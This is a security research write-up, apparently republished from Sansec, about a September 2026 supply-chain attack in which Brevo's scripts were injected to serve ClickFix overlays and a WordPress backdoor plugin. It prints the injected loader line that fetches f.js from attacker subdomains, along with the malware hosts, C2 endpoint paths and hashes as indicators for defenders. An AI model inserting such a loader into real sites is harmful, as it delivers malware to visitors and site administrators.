Brevo supply chain attack hits 100k+ sites with Wordpress backdoors and Clickfix malware
Attackers with Brevo DNS access injected malicious scripts serving ClickFix malware and WordPress backdoors to over 100,000 customer sites on 14 September 2026.
Brevo (formerly Sendinblue), an email marketing platform whose clients include eBay, Louis Vuitton, Michelin and Amnesty International, served injected JavaScript from sendibt1.com domains between 16:05 and 20:12 UTC on 14 September 2026, reaching over 100,000 customer sites and mailing lists. The f.js malware secretly installed a WordPress backdoor plugin from cdn10.sendibt1.com/p/wm.zip using logged-in admins' sessions and showed ClickFix overlays urging visitors to copy-paste and run commands. An SSL certificate for cdn.sendibt1.com created August 25 and attacker-created cdn* DNS records indicate write access to Brevo's Cloudflare DNS, likely via a single Cloudflare account compromise. Sansec recorded 2,549 CSP violation reports across 12 monitored sites; all malicious hosts stopped resolving on 15 September and Brevo's status page lists no incident.
- Brevo served injected f.js malware to 100k+ customer sites and its own pages for roughly four hours on 14 September.
- Malware installed a WordPress backdoor plugin via logged-in admins' sessions; non-admins saw ClickFix copy-paste overlays.
- Attacker-created cdn*.sendibt1.com DNS records suggest compromise of Brevo's Cloudflare account.
- Malicious hosts stopped resolving 15 September; Brevo's status page still shows no incident.
- Admins should check access logs for wp-admin plugin uploads and scan for rogue plugins installed 14 September.
Indicators of compromiseauto-extracted · verify before use · export allAll →
| Type | Indicator | Context |
|---|---|---|
| domain | brevo.com | n a Brevo-sent campaign email AttackerBrevocode injected in brevo.com & sendibt1.comBrevo customers100k+ sites and mailing listsE |
| domain | cdn10.sendibt1.com | om cdn9.sendibt1.com 188.114.97.3 first observed 2026-09-14 cdn10.sendibt1.com cdn11.sendibt1.com # C2 paths, relative to the malware host |
| domain | cdn11.sendibt1.com | m 188.114.97.3 first observed 2026-09-14 cdn10.sendibt1.com cdn11.sendibt1.com # C2 paths, relative to the malware host /f.js the loader / |
| domain | cdn2.sendibt1.com | hild (s); })(); These loader domains vary: cdn.sendibt1.com cdn2.sendibt1.com cdn3.sendibt1.com cdn4.sendibt1.com cdn9.sendibt1.com cdn10 |
| domain | cdn3.sendibt1.com | ese loader domains vary: cdn.sendibt1.com cdn2.sendibt1.com cdn3.sendibt1.com cdn4.sendibt1.com cdn9.sendibt1.com cdn10.sendibt1.com cdn1 |
| domain | sendibt1.com | s suggests a single Cloudflare account holding all of them, sendibt1.com included. That is the zone where the attacker created the c |
| domain | sendinblue.com | udflare DNS: brevo.com , sibforms.com , sibautomation.com , sendinblue.com and sendibt1.com . This suggests a single Cloudflare accoun |
| domain | sibautomation.com | domains all use Cloudflare DNS: brevo.com , sibforms.com , sibautomation.com , sendinblue.com and sendibt1.com . This suggests a single |
| domain | sibforms.com | revo.com iframe page that backs the chat widget, and on the sibforms.com pages that serve hosted signup and unsubscribe forms: < scr |
| ipv4 | 104.21.77.104 | sts (all NXDOMAIN since 15 September 2026) cdn.sendibt1.com 104.21.77.104 created 2026-08-25 17:08 UTC cdn2.sendibt1.com cdn3.sendibt |
| ipv4 | 172.246.243.65 | endibt1.com itself is not proxied, answering on Brevo's own 172.246.243.65 in AS200484 with server: envoy , while only the attacker's |
| ipv4 | 188.114.97.3 | 1.com cdn3.sendibt1.com cdn4.sendibt1.com cdn9.sendibt1.com 188.114.97.3 first observed 2026-09-14 cdn10.sendibt1.com cdn11.sendibt1 |
| sha256 | 26166cd87ff07e7a50317a24126d14b262e842c5715585636dee3ab3f227ddca | tps://conversations-widget.brevo.com/brevo-conversations.js 26166cd87ff07e7a50317a24126d14b262e842c5715585636dee3ab3f227ddca clean, 72816 B 9b62c12bc5c7feb9802f58e6cf75a368690df3c754e3 |
| sha256 | 4af488d79aef7daa12b1c18f0cce28b7edadccb8b6b0fb8d50d1d53a9a7c2df7 | sponse, identical across every host and every observed scan 4af488d79aef7daa12b1c18f0cce28b7edadccb8b6b0fb8d50d1d53a9a7c2df7 {"s":0,"r":"https:\/\/www.google.com"} # Do not block sendi |
| sha256 | 58a5c601c9df7ca2120435588fc39f97712d9b878795f6ee500590099a432308 | 71db2c749fcc24a5bec3875f3654042169fb2418aed09 clean, 3442 B 58a5c601c9df7ca2120435588fc39f97712d9b878795f6ee500590099a432308 injected -> cdn2 f67d572d2d30407b3f470904326411450763108980 |
| sha256 | 9b62c12bc5c7feb9802f58e6cf75a368690df3c754e37cc64483a92acacf87a5 | 7a24126d14b262e842c5715585636dee3ab3f227ddca clean, 72816 B 9b62c12bc5c7feb9802f58e6cf75a368690df3c754e37cc64483a92acacf87a5 injected -> cdn4 # The appended line (final line of each fi |
| sha256 | f67d572d2d30407b3f470904326411450763108980cdad89550fbb221fb06782 | 588fc39f97712d9b878795f6ee500590099a432308 injected -> cdn2 f67d572d2d30407b3f470904326411450763108980cdad89550fbb221fb06782 injected -> cdn11 https://conversations-widget.brevo.com/br |
| sha256 | fe8447fd1ec4dca652b71db2c749fcc24a5bec3875f3654042169fb2418aed09 | e 15 September 2026) https://cdn.brevo.com/js/sdk-loader.js fe8447fd1ec4dca652b71db2c749fcc24a5bec3875f3654042169fb2418aed09 clean, 3442 B 58a5c601c9df7ca2120435588fc39f97712d9b878795f |
Full article1,167 words · extracted from sansec.io · click to collapse
Brevo (aka Sendinblue) lists eBay, Louis Vuitton, Michelin and Amnesty International as its clients. It disclosed (copy) a security incident on 10 September, claiming that 6 customer accounts were hijacked. But four days later, a much larger breach hit all of their customers.
On 14 September, Brevo served malware to visitors of its own site and more than 100 thousand customer sites. The malware had two components:
- a malicious Wordpress plugin, installed when site admins visited their own site
- a clickfix overlay, shown to everyone browsing a customer site or clicking an (unsubscribe) link in a Brevo-sent campaign email
AttackerBrevocode injected in brevo.com & sendibt1.comBrevo customers100k+ sites and mailing listsEmail recipientsclick a link in a campaign,land on a Brevo-hostedunsubscribe or form pageSite visitorsload the tracker or thechat widget on a siteembedding Brevo codeWordPress adminsbrowse their own sitefront end while loggedin to wp-adminClickFix overlaya command is placed on the clipboard and thevisitor is told to paste it and run it themselvesWordpress Plugin installedusing the admin's ownsession: attacker PHP
Evidence and scope
Brevo's own pages served an injected <script>. We confirmed it on www.brevo.com (urlscan), on meet.brevo.com booking pages, on the conversations-widget.brevo.com iframe page that backs the chat widget, and on the sibforms.com pages that serve hosted signup and unsubscribe forms:
<script src="https://cdn9.sendibt1.com/f.js" async data-cfasync="false"></script>
Then there are two JavaScript assets that merchants embed on their own sites (a tracker and a chat widget):
https://cdn.brevo.com/js/sdk-loader.js
https://cdn.brevo.com/js/brevo-conversations.js
Verified copies: sdk-loader.js pointing at cdn2 (16:10:27, 19:56:00) and at cdn11 (18:23:11), and brevo-conversations.js pointing at cdn4 (17:27:25). They got an extra line that loaded the actual malware:
(function () {
var s = document.createElement("script");
s.src = "https://cdn2.sendibt1.com/f.js";
s.async = true;
var h = document.head || document.documentElement;
h.appendChild(s);
})();
These loader domains vary:
cdn.sendibt1.com
cdn2.sendibt1.com
cdn3.sendibt1.com
cdn4.sendibt1.com
cdn9.sendibt1.com
cdn10.sendibt1.com
cdn11.sendibt1.com
An SSL certificate for cdn.sendibt1.com was created on August 25th. Because sendibt1.com is owned and operated by Brevo, this shows that the attacker had write access to Brevo's DNS records.
Brevo served the malware between 16:05:18 and 20:12:53 UTC on 14 September. Sansec's CSP monitor recorded 2,549 violation reports across 12 sites in and after that window.
Brevo published a write-up (archived copy) about a different incident on 10 September, where an attacker abused a SAML SSO flaw to reach 138 customer accounts. It says the attacker lost access at 08:30 UTC that day and that there has been no further activity since. It does not mention injected JavaScript. Brevo's status page has no incident for what we describe here.
Everything is clean at origin now and every malicious host stopped resolving on 15 September. Brevo has not released further communication.
Malware analysis
See the source and our deobfuscated copy of the f.js malware.

Two functions:
- Is the site visitor logged in on Wordpress? Then secretly install a Wordpress plugin from
https://cdn10.sendibt1.com/p/wm.zip. We didn't recover this plugin, but it's likely a backdoor. - Otherwise show the visitor a clickfix overlay (urging the person to prove that they're human by copy-pasting a command)
The malware does not activate for crawlers, developers and automated scanners.
Possible root cause
There are a couple of hints that suggest that the attackers breached Brevo's Cloudflare account:
The modified assets at cdn.brevo.com have been serving the same
Last-Modifieddates, before, during and after the incident.The five Brevo apex domains all use Cloudflare DNS:
brevo.com,sibforms.com,sibautomation.com,sendinblue.comandsendibt1.com. This suggests a single Cloudflare account holding all of them,sendibt1.comincluded. That is the zone where the attacker created thecdn*records. One account compromise would grant both the DNS writes and the ability to rewrite responses across those zones.The
sendibt1.comitself is not proxied, answering on Brevo's own172.246.243.65in AS200484 withserver: envoy, while only the attacker'scdn*records were placed behind the proxy.
Cloudflare Workers or a Snippet support transforming content dynamically.
What Brevo customers should do
Brevo is no longer serving malicious code. However, your Wordpress site may have been backdoored and your customers may have fallen for the Clickfix scam.
Search your access log for a POST to /wp-admin/update.php?action=upload-plugin that day, and for a GET to /wp-admin/plugins.php?action=activate shortly after. Check for any plugin whose install or activation date is 14 September. Compare the plugin directory on disk against what the admin screen lists, because a plugin can hide itself from that screen.
If you run the Brevo tracker, the chat widget or a hosted Brevo form, your site was serving an affected file between 16:05 and 20:13 UTC on 14 September. Anyone who saw a full-page "verify you are human" prompt on a site and followed its instructions ran a malicious command on their own machine. These people should urgently run an anti-virus scan.
Indicators of compromise
# Modified files, sha256 (clean at origin since 15 September 2026)
https://cdn.brevo.com/js/sdk-loader.js
fe8447fd1ec4dca652b71db2c749fcc24a5bec3875f3654042169fb2418aed09 clean, 3442 B
58a5c601c9df7ca2120435588fc39f97712d9b878795f6ee500590099a432308 injected -> cdn2
f67d572d2d30407b3f470904326411450763108980cdad89550fbb221fb06782 injected -> cdn11
https://conversations-widget.brevo.com/brevo-conversations.js
26166cd87ff07e7a50317a24126d14b262e842c5715585636dee3ab3f227ddca clean, 72816 B
9b62c12bc5c7feb9802f58e6cf75a368690df3c754e37cc64483a92acacf87a5 injected -> cdn4
# The appended line (final line of each file, hostname varies)
;(function(){var s=document.createElement("script");s.src="https://cdn2.sendibt1.com/f.js";
s.async=true;var h=document.head||document.documentElement;h.appendChild(s)})();
# Malware hosts (all NXDOMAIN since 15 September 2026)
cdn.sendibt1.com 104.21.77.104 created 2026-08-25 17:08 UTC
cdn2.sendibt1.com
cdn3.sendibt1.com
cdn4.sendibt1.com
cdn9.sendibt1.com 188.114.97.3 first observed 2026-09-14
cdn10.sendibt1.com
cdn11.sendibt1.com
# C2 paths, relative to the malware host
/f.js the loader
/api/v1/0044d4a fingerprint POST cdn, cdn2, cdn11
/api/v1/e08a3c4 proof-of-work token cdn, cdn2, cdn11
/api/v1/8e4c615 fingerprint POST cdn3
/api/v1/f659473 proof-of-work token cdn3
/api/v1/4aff112?tk= clipboard command
/api/v1/b832c14?e= event beacon (click, copy, fallback, failure, close)
/api/v1/4ead0ff?tk= image beacon
/image.php?tk= image beacon
# Kit fingerprints
script[src*="file.js"] self-location selector, file.js is the kit default
script[data-c] self-location fallback, the attribute the injection sets
# C2 cloak response, identical across every host and every observed scan
4af488d79aef7daa12b1c18f0cce28b7edadccb8b6b0fb8d50d1d53a9a7c2df7
{"s":0,"r":"https:\/\/www.google.com"}
# Do not block
sendibt1.com The apex is legitimate Brevo email tracking. Maltrail listed it
on 15 September alongside the malicious subdomains. Blocking it
breaks open and click statistics for every Brevo customer.
Timeline
| Date | Event |
|---|---|
| 2026-08-25 17:08 | cdn.sendibt1.com created, per Certificate Transparency |
| 2026-09-10 06:30 | Brevo identifies the SSO flaw, per its write-up |
| 2026-09-10 08:30 | Attacker loses access in Brevo's SSO incident, per Brevo's write-up |
| 2026-09-14 16:04:23 | Last clean sdk-loader.js observed |
| 2026-09-14 16:05:18 | First malicious sdk-loader.js observed |
| 2026-09-14 20:12:53 | Last malware activity from a Brevo domain |
| 2026-09-15 | Every malicious host stops resolving |
| 2026-09-15 11:41 | Maltrail adds cdn9, cdn10, cdn11 and the apex sendibt1.com |
| 2026-09-15 17:45 | Last CSP report from a cached copy, about 21 hours after the window closed |
| 2026-09-16 | Sansec publishes this analysis |
Read more
Text extracted automatically; images, tables and formatting may be missing. Original: https://sansec.io/research/brevo-supply-chain-attack